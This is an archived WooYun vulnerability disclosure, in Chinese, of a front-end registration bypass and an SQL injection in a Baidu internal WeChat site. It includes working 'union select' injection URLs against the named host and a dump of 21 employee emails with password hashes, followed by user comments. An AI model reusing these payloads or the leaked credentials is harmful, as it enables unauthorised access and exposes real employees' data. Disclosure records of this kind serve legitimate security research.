当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0114928

漏洞标题:百度某内部系统存在逻辑漏洞及SQL注入(导致9000多员工账号密码泄露)

相关厂商:百度

漏洞作者: 杀器王子

提交时间:2015-05-19 13:31

修复时间:2015-07-05 16:10

公开时间:2015-07-05 16:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-19: 细节已通知厂商并且等待厂商处理中
2015-05-21: 厂商已经确认,细节仅向厂商公开
2015-05-31: 细节向核心白帽子及相关领域专家公开
2015-06-10: 细节向普通白帽子公开
2015-06-20: 细节向实习白帽子公开
2015-07-05: 细节向公众公开

简要描述:

杀器在手,天下我有!

详细说明:

http://weixin.family.baidu.com/index.php/site/login
这个是百度family,注册的时候限定只能百度邮箱,但是只是前端验证,可以绕过

baidu1.png


绕过直接注册一个qq邮箱的账号

baidu2.png


收到激活码。激活即可登陆成功,

baidu3.png


登陆成功以后,找到一个注入:

http://weixin.family.baidu.com/index.php/site/user_t?id=1%27%20union%20select%201,2,version%28%29,4%20--%20;


baidu4.png


漏洞证明:

注入,可以跑账号密码,仅测试少量数据。

20 shiyanran@baidu.com
21 madandan@baidu.com
22 linyuguang01@baidu.com
23 lifang@baidu.com
24 renyu04@baidu.com
25 qinsi@baidu.com
26 zhaoyue13@baidu.com
27 wangyingxue@baidu.com
28 tangying01@baidu.com
29 zhanglin@baidu.com
30 menglu@baidu.com
31 jiangjiajuan@baidu.com
32 wencai@baidu.com
33 yangyang@baidu.com
34 zhangxiaonan02@baidu.com
35 limengqi@baidu.com
36 chenchen04@baidu.com
37 xingping@baidu.com
38 wangjifang@baidu.com
39 zhangjiajun@baidu.com
40 zhangmengtao@baidu.com


密码

20 3b3b5bfd7ffc992be972e3e310a1c0b6
21 dacb47cfa9abefe352172f2163c303e0
22 21af188387b880ccef37ab86ede9509a
23 6734f7be9030d2814fc8177551a65bb2
24 c33367701511b4f6020ec61ded352059
25 a3228a45ae89ddd60e1b603dafe16bbd
26 3f64c2a6f6b86faa6be1703695121f48
27 dcc35cff8e9748aec4c60757e4a7271c
28 68f220abf407186ac26d67fea896d07d
29 be5d9ba998a9412a49a6e9d4fcedf931
30 88dc0ab351bed0287ada36766bb9399e
31 e561aeda7988d1a2b85edc58173fe6e5
32 f15b0f346a71d24a13639b9786ee6aca
33 f1247d66afc594721c819fed2624aabd
34 502d337383c26d21b261388094ba11e1
35 ef5401de6db890b7450872a9368d3715
36 8daadfef9cc52b1f1cee2b30819982dd
37 4ea0581f8568fa6edb21e7dd12b4b45e
38 8404aef1286aad6fefecfdaa72ed6926
39 a566bf8a7f4ece886512229329fe7932
40 d33ceffc51d8abf8a42d439c9f25f058


9000多用户啊
http://weixin.family.baidu.com/index.php/site/user_t?id=1%27%20union%20select%201,2,%28SELECT%20count%28*%29%20FROM%20FOTSRbdBZydSEIvukDVz.user%29,4%20--%20;

baidu6.png


修复方案:

版权声明:转载请注明来源 杀器王子@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-05-21 16:09

厂商回复:

感谢白帽子

最新状态:

暂无


漏洞评价:

评论

  1. 2015-05-19 13:33 | sql小神 ( 路人 | Rank:19 漏洞数:4 | 有些漏洞可以提,有些漏洞不可以提。)

    每天看着你和姐姐大人刷洞好开心啊

  2. 2015-05-19 13:38 | 胡小树 ( 实习白帽子 | Rank:60 漏洞数:11 | 我是一颗小小树)

    哇塞这个吊

  3. 2015-05-19 13:39 | 爱上平顶山 认证白帽子 ( 核心白帽子 | Rank:2738 漏洞数:547 | [不戴帽子]异乡过客.曾就职于天朝某机构.IT...)

    草草草

  4. 2015-05-19 13:46 | 小不点 ( 普通白帽子 | Rank:751 漏洞数:78 | 生命不息,刷洞不止.....)

    好强的杀气

  5. 2015-05-19 13:54 | 紫霞仙子 ( 普通白帽子 | Rank:2027 漏洞数:279 | 天天向上 !!!)

    好害怕!

  6. 2015-05-19 14:09 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @sql小神 万一是一个人呢

  7. 2015-05-19 14:11 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    目露凶光,满是杀气

  8. 2015-05-19 14:40 | scanf ( 核心白帽子 | Rank:1232 漏洞数:186 | 。)

    海淀区@杀气王子

  9. 2015-05-19 15:07 | ’‘Nome ( 实习白帽子 | Rank:55 漏洞数:19 | 在此感谢 @M4sk @mango @裤裆 @泳少 @5up3r...)

    @杀器王子 叔叔我们约不约??

  10. 2015-05-19 15:50 | sql小神 ( 路人 | Rank:19 漏洞数:4 | 有些漏洞可以提,有些漏洞不可以提。)

    @xsser 你要说撸管双雄是一个人,我还信,你说姐姐和王子是一个人不信啊,是一对吧,可能会信

  11. 2015-05-19 16:10 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    都是内部的小鲜肉啊

  12. 2015-05-19 21:28 | 多情公子 ( 路人 | Rank:0 漏洞数:2 | google)

    为何可以这么屌...

  13. 2015-07-05 17:29 | 0x 80 ( 普通白帽子 | Rank:1301 漏洞数:398 | 某安全公司招聘系统运维、渗透测试、安全运...)

    这个思路不错